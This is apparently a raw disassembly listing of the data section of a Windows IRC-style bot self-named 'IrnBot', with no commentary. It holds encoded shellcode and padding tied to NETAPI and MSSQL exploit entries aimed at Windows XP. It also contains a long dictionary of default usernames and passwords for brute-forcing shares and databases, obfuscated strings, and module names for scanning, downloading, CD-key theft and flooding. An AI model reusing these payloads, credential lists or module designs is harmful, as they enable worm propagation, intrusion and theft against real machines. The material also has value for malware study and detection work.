		dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
		dd 96h,	0B4h, 0D3h, 0F2h, 110h,	12Fh, 14Dh, 16Ch
dword_425218	dd 2			; DATA XREF: sub_410A9C+13r
					; sub_410A9C+4Fr ...
		align 10h
dword_425220	dd 0FFFFFFFEh		; DATA XREF: sub_411A0A:loc_411A23r
dword_425224	dd 0FFFFFFFEh		; DATA XREF: sub_410A9C+1Br
					; sub_410A9C:loc_410AC5r ...
		align 10h
dword_425230	dd 400h			; DATA XREF: sub_411F29:loc_4122CDr
					; sub_411F29+44Dr
dword_425234	dd 0FFFFFC01h		; DATA XREF: sub_411F29:loc_412098r
dword_425238	dd 35h			; DATA XREF: sub_411F29+78r
					; sub_411F29+176r ...
dword_42523C	dd 0Bh			; DATA XREF: sub_411F29:loc_412234r
					; sub_411F29+3AAr ...
dword_425240	dd 40h			; DATA XREF: sub_411F29+519r
dword_425244	dd 3FFh			; DATA XREF: sub_411F29+452r
					; sub_411F29:loc_41238Cr
dword_425248	dd 80h			; DATA XREF: sub_41246B:loc_41280Fr
					; sub_41246B+44Dr
dword_42524C	dd 0FFFFFF81h		; DATA XREF: sub_41246B:loc_4125DAr
dword_425250	dd 18h			; DATA XREF: sub_41246B+78r
					; sub_41246B+176r ...
dword_425254	dd 8			; DATA XREF: sub_41246B:loc_412776r
					; sub_41246B+3AAr ...
dword_425258	dd 20h			; DATA XREF: sub_41246B+519r
dword_42525C	dd 7Fh			; DATA XREF: sub_41246B+452r
					; sub_41246B:loc_4128CEr
dword_425260	dd 2 dup(0)		; DATA XREF: sub_4129AD+363o
					; sub_413071+18Eo
		dd 4002A000h, 2	dup(0)
		dd 4005C800h, 2	dup(0)
		dd 4008FA00h, 2	dup(0)
		dd 400C9C40h, 2	dup(0)
		dd 400FC350h, 2	dup(0)
		dd 4012F424h, 0
		dd 80000000h, 40169896h, 0
		dd 20000000h, 4019BEBCh, 0
		dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
		dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
		dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
		dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh,	40D3C278h
		dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
		dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
		dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
		dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h,	0A0AEA60Eh
		dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
		dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
		dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h,	5D25D88Bh
		dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
		dd 52028A20h, 7525C460h, 0
dword_4253C0	dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
					; DATA XREF: sub_4129AD+37Ao
					; sub_413071+1B3o
		dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h,	652CD3C3h
		dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h,	3FEEA7C5h
		dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h,	94D5E57Ah
		dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh,	0E15B4C2Fh
		dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
		dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h,	313BBABCh
		dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h,	8D2FEED7h
		dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
		dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
		dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
		dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh,	3B03A686h
		dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h,	0EE32DB23h
		dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h,	11B268E2h
		dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
		dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh,	0BF3C9157h
		dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h,	9FDE2DE4h
		dd 4C8D2CEh, 0AD8A6DDh,	0
		dd offset aBadAllocation ; "bad	allocation"
		dd offset dword_41FF34+4
aNetapi		db 'NETAPI',0           ; DATA XREF: sub_4024A4+81o
					; sub_4024A4+C8r ...
		align 10h
		dd 6 dup(0)
dword_425548	dd 8Bh			; DATA XREF: sub_4024A4+3FEr
					; sub_402AA2+77r ...
dword_42554C	dd 0			; DATA XREF: sub_402AA2:loc_402AF3r
					; sub_41B103+A8r ...
off_425550	dd offset sub_41B3E7	; DATA XREF: sub_413FED+1FEr
					; sub_413FED+301r ...
aMssql		db 'MSSQL',0
		align 4
		dd 6 dup(0)
		dd 599h, 0
		dd offset sub_41BB1E
		dd 4D5953h, 7 dup(0)
		dd 0B97h, 0
		dd offset sub_41B103
		dd 0Bh dup(0)
		dd offset aBadAllocatio_0 ; "bad allocation"
		dd offset aBadAllocatio_1 ; "bad allocation"
dword_4255E0	dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41B103+7Fo
		dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
		dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
		dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh	dup(64646464h)
		dd 1016464h, 40h dup(65656565h), 66010165h, 40h	dup(66666666h)
		dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
		dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
		dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
		dd 6C6C6C01h, 8	dup(6C6C6C6Ch),	41416C6Ch, 100D06EBh, 6D6D501Eh
		dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
		dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
		dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
		dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h,	0AF5B8DF3h
		dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
		dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
		dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
		dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h,	85773449h
		dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh,	0D43C8A9Bh
		dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh,	78281EB8h
		dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
		dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
		dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
		dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h,	2C47A345h
		dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
		dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
		dd 4838E43h, 5180BD0Ch,	0EFAF269Ah, 0D87B5338h,	78A9269Bh
		dd 877FD918h
aMmmmmmmmmmmmmm	db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
		db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
		align 4
byte_4267F4	db 0			; DATA XREF: sub_414D82:loc_414E56r
					; sub_414D82:loc_414F6Fr
a__		db 0Ah
		db 0Dh,'\_/.',0
dword_4267FC	dd 0EFFFC481h, 44FFFFh,	41FF94h	; DATA XREF: sub_41B3E7+321o
dword_426808	dd 42Ah			; DATA XREF: sub_41B3E7+2CBr
dword_42680C	dd 3E8h			; DATA XREF: sub_41B3E7+462r
dword_426810	dd 258h			; DATA XREF: sub_41B3E7+318r
		dd offset aWindowsXpSp0Sp ; "Windows XP	(SP0+SP1)"
		dd 2C6h, 264h, 0
dword_426824	dd 20804h		; DATA XREF: sub_41B3E7+47Br
					; sub_41B3E7+487r ...
		dd offset aBadAllocatio_2 ; "bad allocation"
		dd offset aBadAllocatio_3 ; "bad allocation"
off_426830	dd offset byte_41FF2B	; DATA XREF: sub_41BB1E:loc_41BBFBr
					; sub_41BB1E+EEo
		dd offset aAdministrator ; "administrator"
		dd offset aAdministrador ; "administrador"
		dd offset aAdministrateur ; "administrateur"
		dd offset aAdministrat	; "administrat"
		dd offset aAdmins	; "admins"
		dd offset aAdmin_0	; "admin"
		dd offset aAdm		; "adm"
		dd offset aPassword1	; "password1"
		dd offset aPassword	; "password"
		dd offset aPasswd	; "passwd"
		dd offset aPass1234	; "pass1234"
		dd offset aPass		; "pass"
		dd offset aPwd		; "pwd"
		dd offset a007		; "007"
		dd offset a1		; "1"
		dd offset a12		; "12"
		dd offset a123		; "123"
		dd offset a1234		; "1234"
		dd offset a12345	; "12345"
		dd offset a123456	; "123456"
		dd offset a1234567	; "1234567"
		dd offset a12345678	; "12345678"
		dd offset a123456789	; "123456789"
		dd offset a1234567890	; "1234567890"
		dd offset a2000		; "2000"
		dd offset a2001		; "2001"
		dd offset a2002		; "2002"
		dd offset a2003		; "2003"
		dd offset a2004		; "2004"
		dd offset aTest		; "test"
		dd offset aGuest	; "guest"
		dd offset aNone		; "none"
		dd offset aDemo		; "demo"
		dd offset aUnix		; "unix"
		dd offset aLinux	; "linux"
		dd offset aChangeme	; "changeme"
		dd offset aDefault	; "default"
		dd offset aSystem_0	; "system"
		dd offset aServer	; "server"
		dd offset aRoot_0	; "root"
		dd offset aNull_1	; "null"
		dd offset aQwerty	; "qwerty"
		dd offset aMail		; "mail"
		dd offset aOutlook	; "outlook"
		dd offset aWeb		; "web"
		dd offset aWww		; "www"
		dd offset aInternet	; "internet"
		dd offset aAccounts	; "accounts"
		dd offset aAccounting	; "accounting"
		dd offset aHome		; "home"
		dd offset aHomeuser	; "homeuser"
		dd offset aUser		; "user"
		dd offset aOem		; "oem"
		dd offset aOemuser	; "oemuser"
		dd offset aOeminstall	; "oeminstall"
		dd offset aWindows	; "windows"
		dd offset aWin98	; "win98"
		dd offset aWin2k	; "win2k"
		dd offset aWinxp	; "winxp"
		dd offset aWinnt	; "winnt"
		dd offset aWin2000	; "win2000"
		dd offset aQaz		; "qaz"
		dd offset aAsd		; "asd"
		dd offset aZxc		; "zxc"
		dd offset aQwe		; "qwe"
		dd offset aBob		; "bob"
		dd offset aJen		; "jen"
		dd offset aJoe		; "joe"
		dd offset aFred		; "fred"
		dd offset aBill		; "bill"
		dd offset aMike		; "mike"
		dd offset aJohn		; "john"
		dd offset aPeter	; "peter"
		dd offset aLuke		; "luke"
		dd offset aSam		; "sam"
		dd offset aSue		; "sue"
		dd offset aSusan	; "susan"
		dd offset aPeter_0	; "peter"
		dd offset aBrian	; "brian"
		dd offset aLee		; "lee"
		dd offset aNeil		; "neil"
		dd offset aIan		; "ian"
		dd offset aChris	; "chris"
		dd offset aEric		; "eric"
		dd offset aGeorge	; "george"
		dd offset aKate		; "kate"
		dd offset aBob_0	; "bob"
		dd offset aKatie	; "katie"
		dd offset aMary		; "mary"
		dd offset aLogin	; "login"
		dd offset aLoginpass	; "loginpass"
		dd offset aTechnical	; "technical"
		dd offset aBackup	; "backup"
		dd offset aExchange	; "exchange"
		dd offset aFuck		; "fuck"
		dd offset aBitch	; "bitch"
		dd offset aSlut		; "slut"
		dd offset aSex		; "sex"
		dd offset aGod		; "god"
		dd offset aHell		; "hell"
		dd offset aHello	; "hello"
		dd offset aDomain	; "domain"
		dd offset aDomainpass	; "domainpass"
		dd offset aDomainpassword ; "domainpassword"
		dd offset aDatabase	; "database"
		dd offset aAccess	; "access"
		dd offset aDbpass	; "dbpass"
		dd offset aDbpassword	; "dbpassword"
		dd offset aDatabasepass	; "databasepass"
		dd offset aData		; "data"
		dd offset aDatabasepasswo ; "databasepassword"
		dd offset aDb1		; "db1"
		dd offset aDb2		; "db2"
		dd offset aDb1234	; "db1234"
		dd offset aSa_0		; "sa"
		dd offset aSql		; "sql"
		dd offset aSqlpassoainsta ; "sqlpassoainstall"
		dd offset aOrainstall	; "orainstall"
		dd offset aOracle	; "oracle"
		dd offset aIbm		; "ibm"
		dd offset aCisco	; "cisco"
		dd offset aDell		; "dell"
		dd offset aCompaq	; "compaq"
		dd offset aSiemens	; "siemens"
		dd offset aHp		; "hp"
		dd offset aNokia	; "nokia"
		dd offset aXp		; "xp"
		dd offset aControl	; "control"
		dd offset aOffice	; "office"
		dd offset aBlank	; "blank"
		dd offset aWinpass	; "winpass"
		dd offset aMain		; "main"
		dd offset aLan		; "lan"
		dd offset aInternet_0	; "internet"
		dd offset aIntranet	; "intranet"
		dd offset aStudent	; "student"
		dd offset aTeacher	; "teacher"
		dd offset aStaff	; "staff"
		align 10h
		dd offset aBadAllocatio_4 ; "bad allocation"
		dd offset aBadAllocatio_5 ; "bad allocation"
		dd offset aBadAllocatio_6 ; "bad allocation"
		dd offset aBadAllocatio_7 ; "bad allocation"
		dd offset aBadAllocatio_8 ; "bad allocation"
		dd offset aBadAllocatio_9 ; "bad allocation"
		dd offset aBadAllocati_10 ; "bad allocation"
		dd offset aBadAllocati_11 ; "bad allocation"
dword_426A80	dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
					; DATA XREF: sub_414D82+7Do
		dd 0F3E2FEEBh, 0
dword_426A9C	dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
					; DATA XREF: sub_414D82+192o
		dd 0F3E2FEEBh, 0
dword_426AB8	dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
					; DATA XREF: sub_414FA3+37o
		dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h,	0EB40DA03h
		dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
		dd 38B048Bh, 7275C3C5h,	6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
		dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h,	1C708B0Ch
		dd 8408BADh, 408B09EBh,	7C408D34h, 953C408Bh, 0E4E8EBFh
		dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
		dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h,	0EB525353h
		dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
		dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
		dd 0FFFFh, 0
		dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
		dd 8000h, 80h, 421278h
dword_426BA8	dd 0			; DATA XREF: sub_417760+6Er
dword_426BAC	dd 0			; DATA XREF: sub_417760+75r
		dd 0
		dd 0FF000000h, 0
		dd 0FFFF0000h, 0
		dd 0FFFFFF00h, 0
		dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
		dd 0FFFFFF00h, 0FFFFFFFFh
dword_426BE8	dd 0			; DATA XREF: sub_417760+8Br
dword_426BEC	dd 80000000h		; DATA XREF: sub_417760+91r
		dd 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	80000000h, 0
		dd 800000h, 0
		dd 8000h, 0
		dd 80h,	0
		dd offset dword_421278+10h
		dd offset aBadAllocati_12 ; "bad allocation"
aZQvapODdmQpd	db '§µ±ï¢ ¯¸®´²¤¤¬¸ï¯¤µ',0
		dd 7Bh dup(0)
dword_426E30	dd 80h dup(0)		; DATA XREF: sub_41C77E+412o
		dd 0B5A712AFh, 0AEB8EFB1h, 0AFA0A2B4h, 0A4A4B2B5h, 0A8EFB8ACh
		dd 0AEA7AFh, 0FAh dup(0)
		dd 13090000h, 0EFB1B5A7h, 0ADB3AEB6h, 0A9A7AEA5h, 0EFB1A8B8h
		dd 0AEA7AFA8h, 0FBh dup(0)
		dd 12AFh
aSutowxtbrioxkq	db 'sutoWxTbRIoXkqst',0 ; DATA XREF: sub_41A301:loc_41A32Co
					; sub_41A301+44r
		align 4
		dd 1Bh dup(0)
aTtac		db 'â‗',0             ; DATA XREF: sub_4184BD+2A9o
					; sub_4184BD+375o ...
		align 10h
		dd 3Eh dup(0)
dword_4279B8	dd 0F58C9892h, 82F2958Fh, 8A829492h, 92h, 2 dup(0)
					; DATA XREF: sub_4184BD+2FFo
					; sub_4184BD+38Fo
byte_4279D0	db 2Eh			; DATA XREF: sub_4182F6+E4r
byte_4279D1	db 0ECh, 0B9h, 0	; DATA XREF: sub_4184BD+3A5o
		dd 0Dh dup(0)
		db 0
aIbIaQIdqzVk	db 'ë¶© µïµ©¤ï§´¢ª',0  ; DATA XREF: sub_4184BD+611o
		align 4
		dd 0Bh dup(0)
		db 0
aVqdD		db '²»²·¢ï¤¹¤',0        ; DATA XREF: sub_401DED+60o
					; sub_417C06+B8o ...
		align 4
		dd 1Dh dup(0)
		db 0
aZfvksoftsmapxd	db '‡”‚Š˜Ž”’˜Œ€•„‚',0  ; DATA XREF: sub_41C77E+2C2o
		align 4
		dd 9 dup(0)
		db 0
aTdvIStdIvd	db '»’¤¢´³¨µ¸á’¤³·¨¢¤',0 ; DATA XREF: sub_417C06+A4o
					; sub_417D99+7Co ...
		align 4
		dd 3Ch dup(0)
dword_427C04	dd 8			; DATA XREF: sub_41810B+174r
					; sub_41810B+1B1r
word_427C08	dw 1D0Dh		; DATA XREF: sub_401EF9:loc_401FADr
byte_427C0A	db 1			; DATA XREF: sub_40177B+8Fr
					; sub_4019F3+8Fr
		align 4
		dd offset aBadAllocati_13 ; "bad allocation"
dword_427C10	dd 0F4F9F1F5h, 80828085h, 0F884F080h, 85F5F7F8h, 8583F0F2h
					; DATA XREF: sub_40177B+7Co
		dd 0F4F5F482h, 85F3F6F3h, 0F28080F6h, 87F8F284h, 0F084F587h
		dd 0F6F08287h, 8282F8F8h, 0F4F884F7h, 0F1F0F380h, 0F687F1F2h
		dd 0F7F887F2h, 0F0F5F2F3h, 0F5F482F6h, 0F784F180h, 0F183F683h
		dd 0F4F082F7h, 0F2858387h, 0F1F6F5F8h, 0F383F084h, 84F0F9F3h
		dd 0F8F4F680h, 0F882F080h, 8282F4F4h, 0F98784F8h, 0F5F48483h
		dd 0F182F6F1h, 0F8F4h, 70h dup(0)
dword_427E50	dd 84F4F2F9h, 0F180F7F3h, 0F683F8F9h, 0F284F4F3h, 0F3F885F2h
					; DATA XREF: sub_4019F3+7Co
		dd 0F4F5F6F6h, 0F68082F8h, 8587F080h, 83F587F8h, 0F383F0F5h
		dd 8485F6F6h, 0F4F3F6F2h, 84F4F6F9h, 82F8F2F3h,	0F784F1F4h
		dd 0F5F2F7F8h, 84F582F5h, 82F48084h, 87F3F3F8h,	87F5F783h
		dd 80F8F2F7h, 0F5F7F7F5h, 82F682F9h, 848580F6h,	0F7F6F9F0h
		dd 0F082F484h, 87F5F3F2h, 0F1F0F2F6h, 0F9F98484h, 8480F684h
		dd 0F7F984F7h, 80F9h, 10h dup(0)
aPivk		db 'ˆ‚Š',0             ; DATA XREF: sub_418CAF+216o
					; sub_418F1C+27o
		align 4
		db 0
aSatt		db '‘€’’',0             ; DATA XREF: sub_418CAF+13Eo
		align 10h
		db 2 dup(0)
aFtdu		db '”’„“',0             ; DATA XREF: sub_418CAF+227o
		align 4
		db 3 dup(0)
aSipj		db '‘ˆ†',0             ; DATA XREF: sub_4184BD+1CFo
		dd 0
aSopj		db '‘ކ',0             ; DATA XREF: sub_4184BD+22Fo
		align 4
		db 0
aKivk		db 'Šˆ‚Š',0             ; DATA XREF: sub_4184BD+1DFo
		align 4
		db 2 dup(0)
aLoip		db '‹Žˆ',0             ; DATA XREF: sub_4184BD+2ECo
					; sub_4184BD+355o
		align 4
		db 3 dup(0)
aMoed		db 'ŒŽ…„',0             ; DATA XREF: sub_4184BD+365o
		align 8
aSuicmtj	db '‘“ˆ—Œ’†',0          ; DATA XREF: sub_417FE1+A4o
					; sub_4184BD+1EFo
		dd 2 dup(0)
dword_427F68	dd 0B1B5B5A9h, 0B6EEEEFBh, 0B2EFB6B6h, 0AEB5B9A4h, 0B3A0ECAFh
					; DATA XREF: sub_41B3E7+404o
		dd 0AEA2EFB5h, 0A0A5EEACh, 0B2EEA0B5h, 0A4EFACB8h, 0A4B9h
aDearAntivirusE	db 'Dear Antivirus Employee: It',27h,'s been a rough week here at base c'
		db 'amp, but we will prevail. Lots of love, author of IrnBot. P.S. Fu'
		db 'ck off Symantec.',0
		dd offset aBadAllocati_14 ; "bad allocation"
dword_428024	dd 5348h, 421668h, 421684h, 421848h, 421858h, 42188Ch
					; DATA XREF: sub_4198C0+20o
					; sub_4198C0+8Eo
		dd 42189Ch, 4218B4h
dword_428044	dd 80000002h, 80000001h, 421BCCh ; DATA	XREF: sub_41A6CF+6Bo
dword_428050	dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_41A502+3Do
		dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
		dd 9, 7D8AAFA8h, 0F4BE11C9h, 8,	1Dh dup(0)
		dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
		dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
		dd 9, 5EB02EBh,	0FFFFF9E8h, 0FFh, 1Dh dup(0)
		dd 9
off_428368	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422174o
					; zcrshv4o:00422194o
		align 10h
a_?avclsmodule@	db '.?AVclsModule@@',0
off_428380	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004221BCo
					; zcrshv4o:004221E4o ...
		align 8
a_?avlength_err	db '.?AVlength_error@std@@',0
		align 10h
off_4283A0	dd offset off_41E3AC	; DATA XREF: zcrshv4o:0042220Co
					; zcrshv4o:00422230o ...
		align 8
a_?avlogic_erro	db '.?AVlogic_error@std@@',0
		align 10h
off_4283C0	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004220CCo
					; zcrshv4o:0042227Co ...
		align 8
a_?avexception@	db '.?AVexception@std@@',0
off_4283DC	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422258o
					; zcrshv4o:004222B0o ...
		dd 0
a_?avbad_alloc@	db '.?AVbad_alloc@std@@',0
off_4283F8	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004222D8o
					; zcrshv4o:004222FCo
		align 10h
a_?avmdlupd@@	db '.?AVmdlUPD@@',0
		align 10h
off_428410	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422324o
					; zcrshv4o:00422348o
		align 8
a_?avmdldl@@	db '.?AVmdlDL@@',0
off_428424	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422370o
					; zcrshv4o:00422394o
		dd 0
a_?avmdlipt@@	db '.?AVmdlIPT@@',0
		align 4
off_42843C	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004223BCo
					; zcrshv4o:004223E0o
		dd 0
a_?avmdlijn@@	db '.?AVmdlIJN@@',0
		align 4
off_428454	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422408o
					; zcrshv4o:0042242Co
		dd 0
a_?avmdliquit@@	db '.?AVmdlIQUIT@@',0
		align 4
off_42846C	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422454o
					; zcrshv4o:00422478o
		dd 0
a_?avmdlcdkey@@	db '.?AVmdlCDKey@@',0
		align 4
off_428484	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004224A0o
					; zcrshv4o:004224C4o
		dd 0
a_?avmdlhttpinf	db '.?AVmdlHTTPInfo@@',0
		align 10h
off_4284A0	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004224ECo
					; zcrshv4o:00422510o
		align 8
a_?avmdluptime@	db '.?AVmdlUptime@@',0
off_4284B8	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422538o
					; zcrshv4o:0042255Co
		align 10h
a_?avmdls4stop@	db '.?AVmdlS4Stop@@',0
off_4284D0	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422584o
					; zcrshv4o:004225A8o
		align 8
a_?avmdls4@@	db '.?AVmdlS4@@',0
off_4284E4	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004225D0o
					; zcrshv4o:004225F4o
		dd 0
a_?avmdlnetinfo	db '.?AVmdlNetInfo@@',0
		align 10h
off_428500	dd offset off_41E3AC	; DATA XREF: zcrshv4o:0042261Co
					; zcrshv4o:00422640o
		align 8
a_?avmdlsysinfo	db '.?AVmdlSysInfo@@',0
		align 4
off_42851C	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422668o
					; zcrshv4o:0042268Co
		dd 0
a_?avmdludp@@	db '.?AVmdlUDP@@',0
		align 4
off_428534	dd offset off_41E3AC	; DATA XREF: zcrshv4o:004226B4o
					; zcrshv4o:004226D8o
		dd 0
a_?avmdlscansta	db '.?AVmdlScanStats@@',0
		align 10h
off_428550	dd offset off_41E3AC	; DATA XREF: zcrshv4o:00422700o
					; zcrshv4o:00422724o
		align 8
a_?avmdlscansto	db '.?AVmdlScanStop@@',0
		align 4
off_42856C	dd offset off_41E3AC	; DATA XREF: zcrshv4o:0042274Co
					; zcrshv4o:00422770o
		dd 0
a_?avmdlscanner	db '.?AVmdlScanner@@',0
		align 4
		dd 6 dup(0)
dword_4285A0	dd 0			; DATA XREF: sub_4033C1+4w
					; sub_4034C7+3r
dword_4285A4	dd 0			; DATA XREF: sub_4035D9+2Bo
					; .text:loc_41D245w ...
		align 10h
dword_4285B0	dd 0			; DATA XREF: sub_4035D9:loc_4035FDr
					; sub_4035D9+32w
dword_4285B4	dd 0			; DATA XREF: .text:0040461Fw
